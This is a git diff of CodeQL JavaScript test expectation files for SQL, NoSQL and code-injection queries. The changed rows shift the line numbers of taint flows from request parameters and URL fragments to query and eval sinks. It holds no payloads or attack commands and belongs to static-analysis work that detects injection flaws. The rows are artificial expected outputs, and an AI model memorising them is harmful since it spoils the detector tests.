| mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:35:19:35:23 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:35:19:35:23 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:37:28:37:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:37:28:37:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:39:28:39:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:39:28:39:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:41:28:41:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:41:28:41:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:43:22:43:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:43:22:43:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:45:18:45:22 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:45:18:45:22 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:47:22:47:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:47:22:47:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:49:21:49:25 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:49:21:49:25 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:51:32:51:36 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:51:32:51:36 | query | This query object depends on a $@. 
| mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:53:27:53:31 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:53:27:53:31 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:54:8:54:12 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:54:8:54:12 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:57:17:57:21 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:57:17:57:21 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:58:10:58:14 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:58:10:58:14 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:59:8:59:12 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:59:8:59:12 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:60:7:60:11 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:60:7:60:11 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:61:16:61:20 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:61:16:61:20 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:63:10:63:14 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:63:10:63:14 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:68:46:68:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:68:46:68:50 | query | This query object depends on a $@. 
| mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:69:47:69:51 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:69:47:69:51 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:71:46:71:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:71:46:71:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:73:51:73:55 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:73:51:73:55 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:75:46:75:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:75:46:75:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:78:46:78:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:78:46:78:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:80:51:80:55 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:80:51:80:55 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | | mongoose.js:82:46:82:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:82:46:82:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:83:47:83:51 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:83:47:83:51 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:85:46:85:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:85:46:85:50 | query | This query object depends on a $@. 
| mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:87:51:87:55 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:87:51:87:55 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:89:46:89:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:89:46:89:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:92:46:92:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:92:46:92:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:94:51:94:55 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:94:51:94:55 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:96:46:96:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:96:46:96:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:111:14:111:18 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:111:14:111:18 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:113:31:113:35 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:113:31:113:35 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:116:22:116:25 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:116:22:116:25 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:117:21:117:24 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:117:21:117:24 | cond | This query object depends on a $@. 
| mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:118:21:118:24 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:118:21:118:24 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:119:18:119:21 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:119:18:119:21 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:120:22:120:25 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:120:22:120:25 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:121:16:121:19 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:121:16:121:19 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:122:19:122:22 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:122:19:122:22 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:123:20:123:21 | id | mongoose.js:115:11:115:22 | req.query.id | mongoose.js:123:20:123:21 | id | This query object depends on a $@. | mongoose.js:115:11:115:22 | req.query.id | user-provided value | -| mongoose.js:124:28:124:31 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:124:28:124:31 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:125:28:125:31 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:125:28:125:31 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:126:28:126:31 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:126:28:126:31 | cond | This query object depends on a $@. 
| mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:127:18:127:21 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:127:18:127:21 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:128:22:128:25 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:128:22:128:25 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:129:21:129:24 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:129:21:129:24 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:130:16:130:26 | { _id: id } | mongoose.js:115:11:115:22 | req.query.id | mongoose.js:130:16:130:26 | { _id: id } | This query object depends on a $@. | mongoose.js:115:11:115:22 | req.query.id | user-provided value | -| mongoose.js:136:30:136:34 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:136:30:136:34 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongooseJsonParse.js:23:19:23:23 | query | mongooseJsonParse.js:20:30:20:43 | req.query.data | mongooseJsonParse.js:23:19:23:23 | query | This query object depends on a $@. | mongooseJsonParse.js:20:30:20:43 | req.query.data | user-provided value | +| mongoose.js:97:14:97:18 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:97:14:97:18 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:99:31:99:35 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:99:31:99:35 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:102:22:102:25 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:102:22:102:25 | cond | This query object depends on a $@. 
| mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:103:21:103:24 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:103:21:103:24 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:104:21:104:24 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:104:21:104:24 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:105:18:105:21 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:105:18:105:21 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:106:22:106:25 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:106:22:106:25 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:107:16:107:19 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:107:16:107:19 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:108:19:108:22 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:108:19:108:22 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:109:20:109:21 | id | mongoose.js:101:11:101:22 | req.query.id | mongoose.js:109:20:109:21 | id | This query object depends on a $@. | mongoose.js:101:11:101:22 | req.query.id | user-provided value | +| mongoose.js:110:28:110:31 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:110:28:110:31 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:111:28:111:31 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:111:28:111:31 | cond | This query object depends on a $@. 
| mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:112:28:112:31 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:112:28:112:31 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:113:18:113:21 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:113:18:113:21 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:114:22:114:25 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:114:22:114:25 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:115:21:115:24 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:115:21:115:24 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | req.query.cond | user-provided value | +| mongoose.js:116:16:116:26 | { _id: id } | mongoose.js:101:11:101:22 | req.query.id | mongoose.js:116:16:116:26 | { _id: id } | This query object depends on a $@. | mongoose.js:101:11:101:22 | req.query.id | user-provided value | +| mongoose.js:122:30:122:34 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:122:30:122:34 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongooseJsonParse.js:22:19:22:23 | query | mongooseJsonParse.js:20:30:20:43 | req.query.data | mongooseJsonParse.js:22:19:22:23 | query | This query object depends on a $@. | mongooseJsonParse.js:20:30:20:43 | req.query.data | user-provided value | | mongooseModelClient.js:11:16:11:24 | { id: v } | mongooseModelClient.js:10:22:10:29 | req.body | mongooseModelClient.js:11:16:11:24 | { id: v } | This query object depends on a $@. 
| mongooseModelClient.js:10:22:10:29 | req.body | user-provided value | | mongooseModelClient.js:12:16:12:34 | { id: req.body.id } | mongooseModelClient.js:12:22:12:29 | req.body | mongooseModelClient.js:12:16:12:34 | { id: req.body.id } | This query object depends on a $@. | mongooseModelClient.js:12:22:12:29 | req.body | user-provided value | | mysql.js:15:18:15:65 | 'SELECT ... + temp | mysql.js:6:16:6:31 | req.params.value | mysql.js:15:18:15:65 | 'SELECT ... + temp | This query string depends on a $@. | mysql.js:6:16:6:31 | req.params.value | user-provided value | 
@@ -751,7 +751,7 @@ subpaths | redis.js:43:27:43:29 | key | redis.js:38:17:38:24 | req.body | redis.js:43:27:43:29 | key | This query object depends on a $@. | redis.js:38:17:38:24 | req.body | user-provided value | | redis.js:46:34:46:36 | key | redis.js:38:17:38:24 | req.body | redis.js:46:34:46:36 | key | This query object depends on a $@. | redis.js:38:17:38:24 | req.body | user-provided value | | socketio.js:11:12:11:53 | `INSERT ... andle}` | socketio.js:10:25:10:30 | handle | socketio.js:11:12:11:53 | `INSERT ... andle}` | This query string depends on a $@. | socketio.js:10:25:10:30 | handle | user-provided value | -| tst2.js:9:27:9:84 | "select ... d + "'" | tst2.js:9:66:9:78 | req.params.id | tst2.js:9:27:9:84 | "select ... d + "'" | This query string depends on a $@. | tst2.js:9:66:9:78 | req.params.id | user-provided value | +| tst2.js:8:27:8:84 | "select ... d + "'" | tst2.js:8:66:8:78 | req.params.id | tst2.js:8:27:8:84 | "select ... d + "'" | This query string depends on a $@. | tst2.js:8:66:8:78 | req.params.id | user-provided value | | tst3.js:9:14:9:19 | query1 | tst3.js:8:16:8:34 | req.params.category | tst3.js:9:14:9:19 | query1 | This query string depends on a $@. | tst3.js:8:16:8:34 | req.params.category | user-provided value | | tst4.js:8:10:8:66 | 'SELECT ... d + '"' | tst4.js:8:46:8:60 | $routeParams.id | tst4.js:8:10:8:66 | 'SELECT ... d + '"' | This query string depends on a $@. | tst4.js:8:46:8:60 | $routeParams.id | user-provided value | | tst.js:10:10:10:64 | 'SELECT ... d + '"' | tst.js:10:46:10:58 | req.params.id | tst.js:10:10:10:64 | 'SELECT ... d + '"' | This query string depends on a $@. | tst.js:10:46:10:58 | req.params.id | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.expected b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.expected index e536c54dbd2f..59a5381f2cd2 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.expected 
@@ -2,14 +2,14 @@ edges | NoSQLCodeInjection.js:18:24:18:31 | req.body | NoSQLCodeInjection.js:18:24:18:37 | req.body.query | provenance | | | NoSQLCodeInjection.js:19:36:19:43 | req.body | NoSQLCodeInjection.js:19:24:19:48 | "name = ... dy.name | provenance | | | NoSQLCodeInjection.js:22:36:22:43 | req.body | NoSQLCodeInjection.js:22:24:22:48 | "name = ... dy.name | provenance | | -| express.js:7:44:7:62 | req.param("wobble") | express.js:7:24:7:69 | "return ... + "];" | provenance | | -| express.js:9:54:9:72 | req.param("wobble") | express.js:9:34:9:79 | "return ... + "];" | provenance | | -| express.js:12:28:12:46 | req.param("wobble") | express.js:12:8:12:53 | "return ... + "];" | provenance | | -| express.js:26:9:26:35 | taint | express.js:27:34:27:38 | taint | provenance | | -| express.js:26:17:26:35 | req.param("wobble") | express.js:26:9:26:35 | taint | provenance | | -| express.js:34:9:34:35 | taint | express.js:43:15:43:19 | taint | provenance | | -| express.js:34:17:34:35 | req.param("wobble") | express.js:34:9:34:35 | taint | provenance | | -| express.js:49:30:49:32 | msg | express.js:50:10:50:12 | msg | provenance | | +| express.js:6:44:6:62 | req.param("wobble") | express.js:6:24:6:69 | "return ... + "];" | provenance | | +| express.js:7:54:7:72 | req.param("wobble") | express.js:7:34:7:79 | "return ... + "];" | provenance | | +| express.js:9:28:9:46 | req.param("wobble") | express.js:9:8:9:53 | "return ... 
+ "];" | provenance | | +| express.js:19:9:19:35 | taint | express.js:20:34:20:38 | taint | provenance | | +| express.js:19:17:19:35 | req.param("wobble") | express.js:19:9:19:35 | taint | provenance | | +| express.js:27:9:27:35 | taint | express.js:36:15:36:19 | taint | provenance | | +| express.js:27:17:27:35 | req.param("wobble") | express.js:27:9:27:35 | taint | provenance | | +| express.js:42:30:42:32 | msg | express.js:43:10:43:12 | msg | provenance | | | react-native.js:7:7:7:33 | tainted | react-native.js:8:32:8:38 | tainted | provenance | | | react-native.js:7:7:7:33 | tainted | react-native.js:10:23:10:29 | tainted | provenance | | | react-native.js:7:17:7:33 | req.param("code") | react-native.js:7:7:7:33 | tainted | provenance | | 
@@ -28,17 +28,17 @@ edges | template-sinks.js:18:9:18:31 | tainted | template-sinks.js:32:16:32:22 | tainted | provenance | | | template-sinks.js:18:9:18:31 | tainted | template-sinks.js:33:17:33:23 | tainted | provenance | | | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:18:9:18:31 | tainted | provenance | | -| tst.js:2:6:2:27 | documen ... on.href | tst.js:2:6:2:83 | documen ... t=")+8) | provenance | | -| tst.js:14:10:14:33 | documen ... .search | tst.js:14:10:14:74 | documen ... , "$1") | provenance | | -| tst.js:23:11:23:32 | documen ... on.hash | tst.js:23:11:23:45 | documen ... ring(1) | provenance | | -| tst.js:23:11:23:45 | documen ... ring(1) | tst.js:23:6:23:46 | atob(do ... ing(1)) | provenance | | -| tst.js:26:26:26:40 | location.search | tst.js:26:26:26:53 | locatio ... ring(1) | provenance | | -| tst.js:29:9:29:82 | source | tst.js:31:18:31:23 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:33:14:33:19 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:35:28:35:33 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:37:33:37:38 | source | provenance | | -| tst.js:29:18:29:41 | documen ... .search | tst.js:29:18:29:82 | documen ... , "$1") | provenance | | -| tst.js:29:18:29:82 | documen ... , "$1") | tst.js:29:9:29:82 | source | provenance | | +| tst.js:1:6:1:27 | documen ... on.href | tst.js:1:6:1:83 | documen ... t=")+8) | provenance | | +| tst.js:11:10:11:33 | documen ... .search | tst.js:11:10:11:74 | documen ... , "$1") | provenance | | +| tst.js:17:11:17:32 | documen ... on.hash | tst.js:17:11:17:45 | documen ... ring(1) | provenance | | +| tst.js:17:11:17:45 | documen ... ring(1) | tst.js:17:6:17:46 | atob(do ... ing(1)) | provenance | | +| tst.js:19:26:19:40 | location.search | tst.js:19:26:19:53 | locatio ... 
ring(1) | provenance | | +| tst.js:22:9:22:82 | source | tst.js:24:18:24:23 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:26:14:26:19 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:28:28:28:33 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:30:33:30:38 | source | provenance | | +| tst.js:22:18:22:41 | documen ... .search | tst.js:22:18:22:82 | documen ... , "$1") | provenance | | +| tst.js:22:18:22:82 | documen ... , "$1") | tst.js:22:9:22:82 | source | provenance | | nodes | NoSQLCodeInjection.js:18:24:18:31 | req.body | semmle.label | req.body | | NoSQLCodeInjection.js:18:24:18:37 | req.body.query | semmle.label | req.body.query | 
@@ -61,24 +61,24 @@ nodes | angularjs.js:47:16:47:30 | location.search | semmle.label | location.search | | angularjs.js:50:22:50:36 | location.search | semmle.label | location.search | | angularjs.js:53:32:53:46 | location.search | semmle.label | location.search | -| express.js:7:24:7:69 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:7:44:7:62 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:9:34:9:79 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:9:54:9:72 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:12:8:12:53 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:12:28:12:46 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:15:22:15:54 | req.par ... ction") | semmle.label | req.par ... ction") | -| express.js:17:30:17:53 | req.par ... cript") | semmle.label | req.par ... cript") | -| express.js:19:37:19:70 | req.par ... odule") | semmle.label | req.par ... odule") | -| express.js:21:19:21:48 | req.par ... ntext") | semmle.label | req.par ... ntext") | -| express.js:26:9:26:35 | taint | semmle.label | taint | -| express.js:26:17:26:35 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:27:34:27:38 | taint | semmle.label | taint | -| express.js:34:9:34:35 | taint | semmle.label | taint | -| express.js:34:17:34:35 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:43:15:43:19 | taint | semmle.label | taint | -| express.js:49:30:49:32 | msg | semmle.label | msg | -| express.js:50:10:50:12 | msg | semmle.label | msg | +| express.js:6:24:6:69 | "return ... + "];" | semmle.label | "return ... + "];" | +| express.js:6:44:6:62 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:7:34:7:79 | "return ... + "];" | semmle.label | "return ... 
+ "];" | +| express.js:7:54:7:72 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:9:8:9:53 | "return ... + "];" | semmle.label | "return ... + "];" | +| express.js:9:28:9:46 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:11:22:11:54 | req.par ... ction") | semmle.label | req.par ... ction") | +| express.js:12:30:12:53 | req.par ... cript") | semmle.label | req.par ... cript") | +| express.js:13:37:13:70 | req.par ... odule") | semmle.label | req.par ... odule") | +| express.js:14:19:14:48 | req.par ... ntext") | semmle.label | req.par ... ntext") | +| express.js:19:9:19:35 | taint | semmle.label | taint | +| express.js:19:17:19:35 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:20:34:20:38 | taint | semmle.label | taint | +| express.js:27:9:27:35 | taint | semmle.label | taint | +| express.js:27:17:27:35 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:36:15:36:19 | taint | semmle.label | taint | +| express.js:42:30:42:32 | msg | semmle.label | msg | +| express.js:43:10:43:12 | msg | semmle.label | msg | | module.js:9:16:9:29 | req.query.code | semmle.label | req.query.code | | module.js:11:17:11:30 | req.query.code | semmle.label | req.query.code | | react-native.js:7:7:7:33 | tainted | semmle.label | tainted | 
@@ -102,25 +102,25 @@ nodes | template-sinks.js:31:19:31:25 | tainted | semmle.label | tainted | | template-sinks.js:32:16:32:22 | tainted | semmle.label | tainted | | template-sinks.js:33:17:33:23 | tainted | semmle.label | tainted | -| tst.js:2:6:2:27 | documen ... on.href | semmle.label | documen ... on.href | -| tst.js:2:6:2:83 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:5:12:5:33 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:14:10:14:33 | documen ... .search | semmle.label | documen ... .search | -| tst.js:14:10:14:74 | documen ... , "$1") | semmle.label | documen ... , "$1") | -| tst.js:17:21:17:42 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:20:30:20:51 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:23:6:23:46 | atob(do ... ing(1)) | semmle.label | atob(do ... ing(1)) | -| tst.js:23:11:23:32 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:23:11:23:45 | documen ... ring(1) | semmle.label | documen ... ring(1) | -| tst.js:26:26:26:40 | location.search | semmle.label | location.search | -| tst.js:26:26:26:53 | locatio ... ring(1) | semmle.label | locatio ... ring(1) | -| tst.js:29:9:29:82 | source | semmle.label | source | -| tst.js:29:18:29:41 | documen ... .search | semmle.label | documen ... .search | -| tst.js:29:18:29:82 | documen ... , "$1") | semmle.label | documen ... , "$1") | -| tst.js:31:18:31:23 | source | semmle.label | source | -| tst.js:33:14:33:19 | source | semmle.label | source | -| tst.js:35:28:35:33 | source | semmle.label | source | -| tst.js:37:33:37:38 | source | semmle.label | source | +| tst.js:1:6:1:27 | documen ... on.href | semmle.label | documen ... on.href | +| tst.js:1:6:1:83 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:3:12:3:33 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:11:10:11:33 | documen ... .search | semmle.label | documen ... 
.search | +| tst.js:11:10:11:74 | documen ... , "$1") | semmle.label | documen ... , "$1") | +| tst.js:13:21:13:42 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:15:30:15:51 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:17:6:17:46 | atob(do ... ing(1)) | semmle.label | atob(do ... ing(1)) | +| tst.js:17:11:17:32 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:17:11:17:45 | documen ... ring(1) | semmle.label | documen ... ring(1) | +| tst.js:19:26:19:40 | location.search | semmle.label | location.search | +| tst.js:19:26:19:53 | locatio ... ring(1) | semmle.label | locatio ... ring(1) | +| tst.js:22:9:22:82 | source | semmle.label | source | +| tst.js:22:18:22:41 | documen ... .search | semmle.label | documen ... .search | +| tst.js:22:18:22:82 | documen ... , "$1") | semmle.label | documen ... , "$1") | +| tst.js:24:18:24:23 | source | semmle.label | source | +| tst.js:26:14:26:19 | source | semmle.label | source | +| tst.js:28:28:28:33 | source | semmle.label | source | +| tst.js:30:33:30:38 | source | semmle.label | source | | webix/webix.html:3:16:3:37 | documen ... on.hash | semmle.label | documen ... on.hash | | webix/webix.html:4:26:4:47 | documen ... on.hash | semmle.label | documen ... on.hash | | webix/webix.html:5:47:5:68 | documen ... on.hash | semmle.label | documen ... on.hash | 
@@ -147,16 +147,16 @@ subpaths | angularjs.js:47:16:47:30 | location.search | angularjs.js:47:16:47:30 | location.search | angularjs.js:47:16:47:30 | location.search | This code execution depends on a $@. | angularjs.js:47:16:47:30 | location.search | user-provided value | | angularjs.js:50:22:50:36 | location.search | angularjs.js:50:22:50:36 | location.search | angularjs.js:50:22:50:36 | location.search | This code execution depends on a $@. | angularjs.js:50:22:50:36 | location.search | user-provided value | | angularjs.js:53:32:53:46 | location.search | angularjs.js:53:32:53:46 | location.search | angularjs.js:53:32:53:46 | location.search | This code execution depends on a $@. | angularjs.js:53:32:53:46 | location.search | user-provided value | -| express.js:7:24:7:69 | "return ... + "];" | express.js:7:44:7:62 | req.param("wobble") | express.js:7:24:7:69 | "return ... + "];" | This code execution depends on a $@. | express.js:7:44:7:62 | req.param("wobble") | user-provided value | -| express.js:9:34:9:79 | "return ... + "];" | express.js:9:54:9:72 | req.param("wobble") | express.js:9:34:9:79 | "return ... + "];" | This code execution depends on a $@. | express.js:9:54:9:72 | req.param("wobble") | user-provided value | -| express.js:12:8:12:53 | "return ... + "];" | express.js:12:28:12:46 | req.param("wobble") | express.js:12:8:12:53 | "return ... + "];" | This code execution depends on a $@. | express.js:12:28:12:46 | req.param("wobble") | user-provided value | -| express.js:15:22:15:54 | req.par ... ction") | express.js:15:22:15:54 | req.par ... ction") | express.js:15:22:15:54 | req.par ... ction") | This code execution depends on a $@. | express.js:15:22:15:54 | req.par ... ction") | user-provided value | -| express.js:17:30:17:53 | req.par ... cript") | express.js:17:30:17:53 | req.par ... cript") | express.js:17:30:17:53 | req.par ... cript") | This code execution depends on a $@. | express.js:17:30:17:53 | req.par ... 
